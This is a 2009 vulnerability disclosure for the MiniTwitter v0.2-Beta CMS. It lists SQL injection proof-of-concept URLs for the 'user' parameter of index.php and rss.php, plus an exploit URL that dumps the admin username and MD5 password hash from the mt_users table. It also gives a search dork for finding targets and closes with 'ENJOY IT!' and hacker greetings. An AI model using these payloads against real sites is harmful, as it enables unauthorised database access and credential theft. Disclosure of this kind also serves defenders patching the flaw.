--------------------------------------------------------------------- MULTIPLE SQL INJECTION VULNERABILITIES --MiniTwitter v0.2-Beta--> --------------------------------------------------------------------- CMS INFORMATION: -->WEB: http://mt.bioscriptsdb.com/ -->DOWNLOAD: http://sourceforge.net/projects/minitt/ -->DEMO: http://www.bioscripts.net/minitwitter/index.php -->CATEGORY: Social Networking -->DESCRIPTION: Your business needs a private twitter. You can add... several twitters account and use this twitter as a buckup of all... -->RELEASED: 2009-04-30 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "BioScripts" -->CATEGORY: SQL INJECTION (SQLi) -->AFFECT VERSION: <= 0.2 Beta -->Discovered Bug date: 2009-04-30 -->Reported Bug date: 2009-04-30 -->Fixed bug date: 2009-05-01 -->Info patch (0.3 Beta): http://sourceforge.net/projects/minitt/ -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cuņada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ############################## ////////////////////////////// SQL INJECTION (SQLi): ///////////////////////////// ############################## <<<<---------++++++++++++++ Condition-1: magic_quotes_gpc=off +++++++++++++++++--------->>>> <<<<---------++++++++++++++++ Condition-2: Be register user +++++++++++++++++++--------->>>> This aplication is completely vulnerable to sql injection. ----- PoC: ----- File: index.php Var: GET var 'user' --> http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+1,version()/* Return --> Database version. File: inc/rss.php Var: GET var 'user' --> http://[HOST]/[HOME_PATH]/rss.php?user=2%27+UNION+ALL+SELECT+user(),2/* Return --> Database user. --------- EXPLOIT: --------- http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+2,concat(nick,0x3A3A3A,password)+FROM+mt_users+WHERE+id_usr=1/* Return --> nick:::password(md5 hash) <<<-----------------------------EOF---------------------------------->>>ENJOY IT! ####################################################################### ####################################################################### ##*******************************************************************## ## ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### #######################################################################